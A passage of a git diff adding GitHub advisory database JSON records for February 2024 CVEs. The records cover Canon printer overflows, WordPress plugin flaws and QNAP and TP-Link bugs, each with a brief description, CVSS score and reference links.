+ "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T02:15:55Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mcx4-2h94-vmqp/GHSA-mcx4-2h94-vmqp.json b/advisories/unreviewed/2024/02/GHSA-mcx4-2h94-vmqp/GHSA-mcx4-2h94-vmqp.json new file mode 100644 index 0000000000000..3c9b9b25b95bf --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mcx4-2h94-vmqp/GHSA-mcx4-2h94-vmqp.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mcx4-2h94-vmqp", + "modified": "2024-02-06T06:30:31Z", + "published": "2024-02-06T06:30:31Z", + "aliases": [ + "CVE-2023-33069" + ], + "details": "Memory corruption in Audio while processing the calibration data returned from ACDB loader.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-33069" + }, + { + "type": "WEB", + "url": "https://www.qualcomm.com/company/product-security/bulletins/february-2024-bulletin" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T06:16:00Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mf92-wvmg-38g9/GHSA-mf92-wvmg-38g9.json b/advisories/unreviewed/2024/02/GHSA-mf92-wvmg-38g9/GHSA-mf92-wvmg-38g9.json new file mode 100644 index 0000000000000..e1684d4388c20 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mf92-wvmg-38g9/GHSA-mf92-wvmg-38g9.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mf92-wvmg-38g9", + "modified": "2024-02-05T18:31:37Z", + "published": "2024-02-05T18:31:37Z", + "aliases": [ + "CVE-2023-47355" + ], + "details": "The com.eypcnnapps.quickreboot (aka Eyuep Can Yilmaz {ROOT] Quick Reboot) application 1.0.8 for Android has exposed broadcast receivers for PowerOff, Reboot, and Recovery (e.g., com.eypcnnapps.quickreboot.widget.PowerOff) that are susceptible to unauthorized broadcasts because of missing input validation.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47355" + }, + { + "type": "WEB", + "url": "https://github.com/actuator/com.eypcnnapps.quickreboot/blob/main/CWE-925.md" + }, + { + "type": "WEB", + "url": "https://play.google.com/store/apps/details?id=com.eypcnnapps.quickreboot" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T16:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mf94-378q-xvc3/GHSA-mf94-378q-xvc3.json b/advisories/unreviewed/2024/02/GHSA-mf94-378q-xvc3/GHSA-mf94-378q-xvc3.json new file mode 100644 index 0000000000000..8dde54626b6aa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mf94-378q-xvc3/GHSA-mf94-378q-xvc3.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mf94-378q-xvc3", + "modified": "2024-02-06T03:32:59Z", + "published": "2024-02-06T03:32:59Z", + "aliases": [ + "CVE-2023-47022" + ], + "details": "An issue in NCR Terminal Handler v.1.5.1 allows a remote attacker to execute arbitrary code via a crafted script to the payload parameter.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-47022" + }, + { + "type": "WEB", + "url": "https://docs.google.com/document/d/15s7NftTX2dxfcFnMqkFIyeN48xq3LceesWOhP-9xL4Y/edit?usp=sharing" + }, + { + "type": "WEB", + "url": "https://github.com/Patrick0x41/Security-Advisories/tree/main/CVE-2023-47022" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mfph-26j7-jm24/GHSA-mfph-26j7-jm24.json b/advisories/unreviewed/2024/02/GHSA-mfph-26j7-jm24/GHSA-mfph-26j7-jm24.json new file mode 100644 index 0000000000000..66be65c1d5fc8 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mfph-26j7-jm24/GHSA-mfph-26j7-jm24.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mfph-26j7-jm24", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2024-0244" + ], + "details": "Buffer overflow in CPCA PCFAX number process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*:Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS MF750C Series/Color imageCLASS X MF1333C firmware v03.07 and earlier sold in US. i-SENSYS MF754Cdw/C1333iF firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0244" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mfxx-xjx2-rcm9/GHSA-mfxx-xjx2-rcm9.json b/advisories/unreviewed/2024/02/GHSA-mfxx-xjx2-rcm9/GHSA-mfxx-xjx2-rcm9.json new file mode 100644 index 0000000000000..9933a6c75cc96 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mfxx-xjx2-rcm9/GHSA-mfxx-xjx2-rcm9.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mfxx-xjx2-rcm9", + "modified": "2024-02-07T09:30:31Z", + "published": "2024-02-07T09:30:31Z", + "aliases": [ + "CVE-2024-1037" + ], + "details": "The All-In-One Security (AIOS) – Security and Firewall plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'tab' parameter in all versions up to, and including, 5.2.5 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1037" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L32" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/all-in-one-wp-security-and-firewall/trunk/admin/wp-security-list-404.php#L50" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3032127/all-in-one-wp-security-and-firewall/tags/5.2.6/admin/wp-security-list-404.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b50772e5-5142-4f50-b5c0-6116a8821cba?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-07T07:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mgqx-9848-6j3q/GHSA-mgqx-9848-6j3q.json b/advisories/unreviewed/2024/02/GHSA-mgqx-9848-6j3q/GHSA-mgqx-9848-6j3q.json new file mode 100644 index 0000000000000..a6be019d47fdb --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mgqx-9848-6j3q/GHSA-mgqx-9848-6j3q.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgqx-9848-6j3q", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-1075" + ], + "details": "The Minimal Coming Soon – Coming Soon Page plugin for WordPress is vulnerable to maintenance mode bypass and information disclosure in all versions up to, and including, 2.37. This is due to the plugin improperly validating the request path. This makes it possible for unauthenticated attackers to bypass maintenance mode and view pages that should be hidden.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1075" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php#L67" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3031149/minimal-coming-soon-maintenance-mode/trunk/framework/public/init.php" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/78203b98-15bc-4d8e-9278-c472b518be07?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "LOW", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mgrh-9mx5-cjmf/GHSA-mgrh-9mx5-cjmf.json b/advisories/unreviewed/2024/02/GHSA-mgrh-9mx5-cjmf/GHSA-mgrh-9mx5-cjmf.json new file mode 100644 index 0000000000000..059b8ddb52bfa --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mgrh-9mx5-cjmf/GHSA-mgrh-9mx5-cjmf.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mgrh-9mx5-cjmf", + "modified": "2024-02-06T00:30:27Z", + "published": "2024-02-06T00:30:27Z", + "aliases": [ + "CVE-2024-0691" + ], + "details": "The FileBird plugin for WordPress is vulnerable to Stored Cross-Site Scripting via imported folder titles in all versions up to, and including, 5.5.8.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator access, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. It may also be possible to socially engineer an administrator into uploading a malicious folder import.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0691" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3023924/filebird" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/47f04985-dd9b-449f-8b4c-9811fe7e4a96?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:16:04Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mh9r-mh3m-pcgq/GHSA-mh9r-mh3m-pcgq.json b/advisories/unreviewed/2024/02/GHSA-mh9r-mh3m-pcgq/GHSA-mh9r-mh3m-pcgq.json new file mode 100644 index 0000000000000..9ba45c2fcac9c --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mh9r-mh3m-pcgq/GHSA-mh9r-mh3m-pcgq.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mh9r-mh3m-pcgq", + "modified": "2024-02-02T00:31:26Z", + "published": "2024-02-02T00:31:26Z", + "aliases": [ + "CVE-2023-46706" + ], + "details": "\n\n\nMultiple MachineSense devices have credentials unable to be changed by the user or administrator.\n\n\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-46706" + }, + { + "type": "WEB", + "url": "https://machinesense.com/pages/about-machinesense" + }, + { + "type": "WEB", + "url": "https://www.cisa.gov/news-events/ics-advisories/icsa-24-025-01" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-798" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T23:15:09Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mhh5-gvh7-h426/GHSA-mhh5-gvh7-h426.json b/advisories/unreviewed/2024/02/GHSA-mhh5-gvh7-h426/GHSA-mhh5-gvh7-h426.json new file mode 100644 index 0000000000000..4cf56973b7529 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mhh5-gvh7-h426/GHSA-mhh5-gvh7-h426.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhh5-gvh7-h426", + "modified": "2024-02-04T06:30:20Z", + "published": "2024-02-04T06:30:20Z", + "aliases": [ + "CVE-2019-25159" + ], + "details": "A vulnerability was found in mpedraza2020 Intranet del Monterroso up to 4.50.0. It has been classified as critical. This affects an unknown part of the file config/cargos.php. The manipulation of the argument dni_profe leads to sql injection. Upgrading to version 4.51.0 is able to address this issue. The identifier of the patch is 678190bee1dfd64b54a2b0e88abfd009e78adce8. It is recommended to upgrade the affected component. The identifier VDB-252717 was assigned to this vulnerability.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2019-25159" + }, + { + "type": "WEB", + "url": "https://github.com/mpedraza2020/IESMONTEROSOINTRANET/commit/678190bee1dfd64b54a2b0e88abfd009e78adce8" + }, + { + "type": "WEB", + "url": "https://github.com/mpedraza2020/IESMONTEROSOINTRANET/releases/tag/v4.51.0" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252717" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252717" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-04T06:15:07Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mhj8-r2ff-pfwm/GHSA-mhj8-r2ff-pfwm.json b/advisories/unreviewed/2024/02/GHSA-mhj8-r2ff-pfwm/GHSA-mhj8-r2ff-pfwm.json new file mode 100644 index 0000000000000..f1f8b95d230f5 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mhj8-r2ff-pfwm/GHSA-mhj8-r2ff-pfwm.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhj8-r2ff-pfwm", + "modified": "2024-02-01T12:30:23Z", + "published": "2024-02-01T12:30:23Z", + "aliases": [ + "CVE-2023-51690" + ], + "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Advanced iFrame allows Stored XSS.This issue affects Advanced iFrame: from n/a through 2023.8.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51690" + }, + { + "type": "WEB", + "url": "https://patchstack.com/database/vulnerability/advanced-iframe/wordpress-advanced-iframe-plugin-2023-8-cross-site-scripting-xss-vulnerability?_s_id=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-01T11:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mhqq-cwfh-qr59/GHSA-mhqq-cwfh-qr59.json b/advisories/unreviewed/2024/02/GHSA-mhqq-cwfh-qr59/GHSA-mhqq-cwfh-qr59.json new file mode 100644 index 0000000000000..ea125a6972147 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mhqq-cwfh-qr59/GHSA-mhqq-cwfh-qr59.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mhqq-cwfh-qr59", + "modified": "2024-02-02T18:30:31Z", + "published": "2024-02-02T18:30:31Z", + "aliases": [ + "CVE-2023-41277" + ], + "details": "A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.\n\nWe have already fixed the vulnerability in the following versions:\nQTS 5.1.2.2533 build 20230926 and later\nQuTS hero h5.1.2.2534 build 20230927 and later\nQuTScloud c5.1.5.2651 and later\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-41277" + }, + { + "type": "WEB", + "url": "https://www.qnap.com/en/security-advisory/qsa-23-38" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-120" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-02T16:15:48Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mj59-82hp-pgf4/GHSA-mj59-82hp-pgf4.json b/advisories/unreviewed/2024/02/GHSA-mj59-82hp-pgf4/GHSA-mj59-82hp-pgf4.json new file mode 100644 index 0000000000000..d420e62824f9e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mj59-82hp-pgf4/GHSA-mj59-82hp-pgf4.json @@ -0,0 +1,38 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mj59-82hp-pgf4", + "modified": "2024-02-06T18:30:21Z", + "published": "2024-02-06T18:30:21Z", + "aliases": [ + "CVE-2023-36498" + ], + "details": "A post-authentication command injection vulnerability exists in the PPTP client functionality of Tp-Link ER7206 Omada Gigabit VPN Router 1.3.0 build 20230322 Rel.70591. A specially crafted HTTP request can lead to arbitrary command injection. An attacker can make an authenticated HTTP request to trigger this vulnerability and gain access to an unrestricted shell.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-36498" + }, + { + "type": "WEB", + "url": "https://talosintelligence.com/vulnerability_reports/TALOS-2023-1853" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T17:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mm24-rjwq-f95c/GHSA-mm24-rjwq-f95c.json b/advisories/unreviewed/2024/02/GHSA-mm24-rjwq-f95c/GHSA-mm24-rjwq-f95c.json new file mode 100644 index 0000000000000..4ed6e386a4e69 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mm24-rjwq-f95c/GHSA-mm24-rjwq-f95c.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mm24-rjwq-f95c", + "modified": "2024-02-06T00:30:26Z", + "published": "2024-02-06T00:30:26Z", + "aliases": [ + "CVE-2023-6925" + ], + "details": "The Unlimited Addons for WPBakery Page Builder plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation on the 'importZipFile' function in versions up to, and including, 1.0.42. This makes it possible for authenticated attackers with a role that the administrator previously granted access to the plugin (the default is editor role, but access can also be granted to contributor role), to upload arbitrary files on the affected site's server which may make remote code execution possible.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6925" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/unlimited-addons-for-wpbakery-page-builder/trunk/inc_php/layouts/unitecreator_layouts_exporter.class.php?rev=2900676#L703" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/a78b76d6-4068-4141-9726-7db439aa6a9f?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-05T22:15:57Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mm8x-p4pr-4p9f/GHSA-mm8x-p4pr-4p9f.json b/advisories/unreviewed/2024/02/GHSA-mm8x-p4pr-4p9f/GHSA-mm8x-p4pr-4p9f.json new file mode 100644 index 0000000000000..acf8fd5ae5b7e --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mm8x-p4pr-4p9f/GHSA-mm8x-p4pr-4p9f.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mm8x-p4pr-4p9f", + "modified": "2024-02-06T09:31:38Z", + "published": "2024-02-06T09:31:38Z", + "aliases": [ + "CVE-2023-52239" + ], + "details": "The XML parser in Magic xpi Integration Platform 4.13.4 allows XXE attacks, e.g., via onItemImport.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-52239" + }, + { + "type": "WEB", + "url": "https://ds-security.com/post/xml_external_entity_injection_magic_xpi/" + }, + { + "type": "WEB", + "url": "https://www2.magicsoftware.com/ver/docs/Downloads/Magicxpi/4.14/Windows/ReleaseNotes4.14.pdf" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T07:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mmc3-qp8j-6fpj/GHSA-mmc3-qp8j-6fpj.json b/advisories/unreviewed/2024/02/GHSA-mmc3-qp8j-6fpj/GHSA-mmc3-qp8j-6fpj.json new file mode 100644 index 0000000000000..1ee545d66c2d1 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mmc3-qp8j-6fpj/GHSA-mmc3-qp8j-6fpj.json @@ -0,0 +1,39 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmc3-qp8j-6fpj", + "modified": "2024-02-03T09:30:18Z", + "published": "2024-02-03T09:30:18Z", + "aliases": [ + "CVE-2023-44031" + ], + "details": "Incorrect access control in Reprise License Management Software Reprise License Manager v15.1 allows attackers to arbitrarily save sensitive files in insecure locations via a crafted POST request.", + "severity": [ + + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44031" + }, + { + "type": "WEB", + "url": "https://packetstormsecurity.com/files/176841/Reprise-License-Manager-15.1-Privilege-Escalation-File-Write.html" + }, + { + "type": "WEB", + "url": "http://seclists.org/fulldisclosure/2024/Jan/43" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-03T09:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mmfm-2hr6-jvqr/GHSA-mmfm-2hr6-jvqr.json b/advisories/unreviewed/2024/02/GHSA-mmfm-2hr6-jvqr/GHSA-mmfm-2hr6-jvqr.json new file mode 100644 index 0000000000000..3a087d39dd7e6 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mmfm-2hr6-jvqr/GHSA-mmfm-2hr6-jvqr.json @@ -0,0 +1,50 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmfm-2hr6-jvqr", + "modified": "2024-02-06T03:33:00Z", + "published": "2024-02-06T03:33:00Z", + "aliases": [ + "CVE-2023-6229" + ], + "details": "Buffer overflow in CPCA PDL Resource Download process of Office Multifunction Printers and Laser Printers(*) which may allow an attacker on the network segment to trigger the affected product being unresponsive or to execute arbitrary code.*: Satera LBP670C Series/Satera MF750C Series firmware v03.07 and earlier sold in Japan. Color imageCLASS LBP674C/Color imageCLASS X LBP1333C/Color imageCLASS MF750C Series/Color imageCLASS X MF1333C Series firmware v03.07 and earlier sold in US. i-SENSYS LBP673Cdw/C1333P/i-SENSYS MF750C Series/C1333i Series firmware v03.07 and earlier sold in Europe.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6229" + }, + { + "type": "WEB", + "url": "https://canon.jp/support/support-info/240205vulnerability-response" + }, + { + "type": "WEB", + "url": "https://psirt.canon/advisory-information/cp2024-001/" + }, + { + "type": "WEB", + "url": "https://www.canon-europe.com/support/product-security-latest-news/" + }, + { + "type": "WEB", + "url": "https://www.usa.canon.com/support/canon-product-advisories/Service-Notice-Regarding-Vulnerability-Measure-Against-Buffer-Overflow-for-Laser-Printers-and-Small-Office-Multifunctional-Printers" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-787" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-06T01:15:08Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mmgp-f467-5jfj/GHSA-mmgp-f467-5jfj.json b/advisories/unreviewed/2024/02/GHSA-mmgp-f467-5jfj/GHSA-mmgp-f467-5jfj.json new file mode 100644 index 0000000000000..df48051382396 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mmgp-f467-5jfj/GHSA-mmgp-f467-5jfj.json @@ -0,0 +1,42 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmgp-f467-5jfj", + "modified": "2024-02-08T09:30:38Z", + "published": "2024-02-08T09:30:38Z", + "aliases": [ + "CVE-2024-0965" + ], + "details": "The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0965" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3030099/simple-page-access-restriction" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/d99dc270-1b28-4e76-9346-38b2b96be01c?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2024-02-08T09:15:46Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2024/02/GHSA-mmj5-4682-wjr2/GHSA-mmj5-4682-wjr2.json b/advisories/unreviewed/2024/02/GHSA-mmj5-4682-wjr2/GHSA-mmj5-4682-wjr2.json new file mode 100644 index 0000000000000..80badd7d33f29 --- /dev/null +++ b/advisories/unreviewed/2024/02/GHSA-mmj5-4682-wjr2/GHSA-mmj5-4682-wjr2.json @@ -0,0 +1,46 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-mmj5-4682-wjr2", + "modified": "2024-02-02T18:30:32Z", + "published": "2024-02-02T18:30:32Z", + "aliases": [ + "CVE-2024-1185" + ], + "details": "A vulnerability classified as problematic has been found in Nsasoft NBMonitor Network Bandwidth Monitor 1.6.5.0. This affects an unknown part of the component Registration Handler. The manipulation leads to denial of service. The attack needs to be approached locally. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-252675. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-1185" + }, + { + "type": "WEB", + "url": "https://fitoxs.com/vuldb/11-exploit-perl.txt" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.252675" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.252675" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-404" + ], + "severity": 